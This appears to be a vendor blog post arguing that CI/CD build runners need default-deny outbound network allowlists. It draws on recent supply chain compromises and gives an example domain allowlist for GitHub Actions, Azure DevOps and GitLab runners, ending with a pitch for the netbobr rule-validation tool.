Skip to content
Does Your CI/CD Pipeline Let Build Agents Talk to Any IP on the Internet?

Does Your CI/CD Pipeline Let Build Agents Talk to Any IP on the Internet?

April 1, 2026

Go look at the network configuration for your CI/CD runners right now. GitHub Actions runners, Azure DevOps agents, GitLab CI runners, Jenkins nodes, whatever you use.

What outbound network restrictions are in place? What IPs and domains can those runners connect to? What is blocked?

If the answer is "they can reach anything," your build infrastructure is one compromised dependency away from exfiltrating every secret in your pipeline.

Some questions about your build environment

When your CI pipeline runs npm install or pip install, do you control which registries the runner can reach?

If a compromised package tried to POST your environment variables to an attacker-controlled server during the install step, would anything stop that HTTP request from leaving your network?

Do you have any monitoring or alerting on outbound connections from your build agents?

When the Trivy supply chain compromise happened in March 2026, the poisoned GitHub Action harvested CI/CD secrets from runner environments and exfiltrated them to attacker-controlled infrastructure, all while the legitimate scan completed normally so pipelines showed no sign of compromise. The malicious code ran during a GitHub Action, read the runner's environment variables (which contained secrets), and sent them to an external endpoint.

If your build agents had default-deny egress with an allowlist of required domains, that exfiltration would have failed. The request to the attacker's domain would have been blocked.

Did yours have that? Do they have it now?

The build environment is the most privileged, least restricted part of your infrastructure

Think about what a CI/CD runner has access to during a build:

Source code for the entire repository. Cloud credentials stored as pipeline secrets (AWS keys, Azure service principal credentials, GCP service account tokens). Package registry tokens for publishing artifacts. Deployment credentials for pushing to production. SSH keys for accessing infrastructure.

Now think about the network restrictions on the machine holding all of that. In most organizations, the answer is: none. The runner can make outbound connections to any IP on any port. It has to, the reasoning goes, because builds need to download dependencies from package registries, pull container images, and push artifacts.

That reasoning conflates "needs outbound access to specific domains" with "needs unrestricted outbound access to the entire internet." Those are not the same thing.

The supply chain numbers make the case

Supply chain attacks more than doubled in 2025, with global losses reaching 60 billion dollars (Bastion, 2026 Supply Chain Security Report). Sonatype's State of the Software Supply Chain report tracked a 200% year-over-year increase in malicious packages published to public registries. Over 70% of organizations reported experiencing at least one supply chain-related security incident in the same period.

The Verizon DBIR 2025 found that third-party breaches now account for 30% of all data breaches, a 100% increase from previous levels (DeepStrike, Supply Chain Attack Statistics 2025). The attack vector is increasingly the build pipeline itself, not the production application.

In the first half of 2025 alone, the tj-actions/changed-files compromise affected over 23,000 GitHub repositories by stealing CI runner secrets through a modified GitHub Action. The reviewdog/action-setup compromise used the same pattern. The Nx build system compromise used a stolen npm publishing token obtained through a GitHub Actions workflow vulnerability.

All of these attacks followed the same basic model: run malicious code inside a build environment, read secrets from the environment, and exfiltrate them over the network. The malicious code ran with the full permissions of the build agent. The outbound network request succeeded because nothing blocked it.

NSA and CISA published a joint advisory on defending CI/CD environments that recommends implementing network segmentation and filtering traffic to and from build infrastructure. The advisory covers poisoned pipeline execution, insufficient access controls, and insecure system configuration, all patterns seen in the incidents above. This is not a suggestion from a blog post. This is guidance from the agencies responsible for national cybersecurity.

What a CI/CD egress allowlist looks like

The set of domains a build agent genuinely needs to reach is finite and knowable. Here is a starting point for a GitHub Actions workflow that builds a Node.js application and deploys to AWS:

Package registries: registry.npmjs.org, registry.yarnpkg.com

Container registries: ghcr.io, *.docker.io, your private ECR/ACR/GCR endpoint

Cloud provider APIs: Scope these as tightly as possible. Wildcards like *.amazonaws.com or *.azure.com are dangerous because they include customer-controlled endpoints. An attacker can exfiltrate data to their own S3 bucket or Azure Blob Storage account and it will match the wildcard. Prefer specific service subdomains:

  • AWS: s3.us-east-1.amazonaws.com, sts.amazonaws.com, ecr.<region>.amazonaws.com
  • Azure: management.azure.com, <your-registry>.azurecr.io
  • GCP: storage.googleapis.com, <region>-docker.pkg.dev

GitHub itself: github.com, api.github.com, *.actions.githubusercontent.com

OS package updates: archive.ubuntu.com, security.ubuntu.com (if your runners update packages during the build)

Everything else should be denied by default. This list is a starting point. You will need to iterate based on what your builds actually require, and that iteration is part of the value: it forces you to understand your build's dependency footprint.

For self-hosted runners, this is a network firewall rule or a security group on the runner's subnet. For GitHub-hosted runners, this is harder. Standard GitHub-hosted runners provide no egress filtering capability whatsoever. You need GitHub's larger runners (a paid feature) to get VNet integration for Azure, or route through a NAT gateway with restrictive security groups in AWS. If your budget does not cover larger runners, self-hosting is the only path to egress controls on GitHub Actions.

For Azure DevOps self-hosted agents, apply an NSG to the agent subnet with outbound rules that only allow traffic to the domains above on ports 443 and 80. Deny everything else.

For GitLab CI runners on Kubernetes, this is a Kubernetes NetworkPolicy with explicit egress rules listing allowed CIDRs and ports.

The objection and why it does not hold

The common pushback is: "We cannot predict every domain our build will need to reach. What if a new dependency pulls from a CDN we have not allowlisted?"

This is the same argument people make against restrictive firewall rules in every other context. The answer is the same: you start with what you know, you monitor what gets blocked, and you add exceptions through a review process.

The alternative is unlimited egress from the most privileged environment in your infrastructure, which is exactly what most organizations currently have in place, and what attackers are increasingly targeting.

Validating your pipeline network rules

Whether your egress controls are expressed as AWS security groups, Azure NSGs, GCP firewall rules, or Kubernetes NetworkPolicies, they are network security rules. They should be validated with the same rigor as any other firewall policy.

netbobr can import AWS Security Groups, Azure NSGs, GCP Firewall Rules, Kubernetes NetworkPolicies, and Terraform plan/HCL that defines any of them. It validates firewall rules against compliance frameworks (PCI-DSS, NIST 800-53, CIS Controls, NIS2, DORA, MITRE ATT&CK) and scores them for risk. The same validation you apply to production firewall policies should apply to your pipeline network rules. If your build agent's security group allows egress to 0.0.0.0/0, netbobr will flag it the same way it would flag that rule anywhere else in your infrastructure.

The Trivy compromise already showed what happens when build agents have unrestricted egress. The tj-actions compromise confirmed it was not a one-time event. The question is whether your build infrastructure is still configured the same way it was before those incidents.